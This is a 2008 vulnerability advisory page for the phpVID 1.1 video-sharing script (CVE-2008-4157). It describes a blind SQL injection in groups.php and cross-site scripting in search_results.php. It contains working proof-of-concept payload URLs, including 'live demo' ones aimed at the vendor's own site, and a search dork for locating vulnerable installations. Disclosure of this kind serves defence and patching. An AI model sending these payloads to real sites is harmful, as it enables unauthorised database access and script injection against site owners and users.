Bug: phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities ( Ascii Version )

Search:
WLB2

phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities

Published
Credit
Risk
2008.09.24
r45c4l
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4157
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial


# est.2007 forum.darkc0de.com #
########################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
########################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
#################################
#
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
#
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
# Vulnerable Version: 1.1
#
#############################
#
# d0rk:Powered By Vastal I-Tech's phpVID.
#
##############################

Vulnerabilities

Blind SQL Injection in "groups.php" in the "cat" parameter.
Cross Site Scripting in "search_results.php"


POC:
http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.site.com/search_results.php?query=[XSS]


Live Demo:
http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>


###########################################################
#
# Bug discovered : 10 Sep.2008
###########################################################

References:

http://xforce.iss.net/xforce/xfdb/45028
http://www.securityfocus.com/bid/31108

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version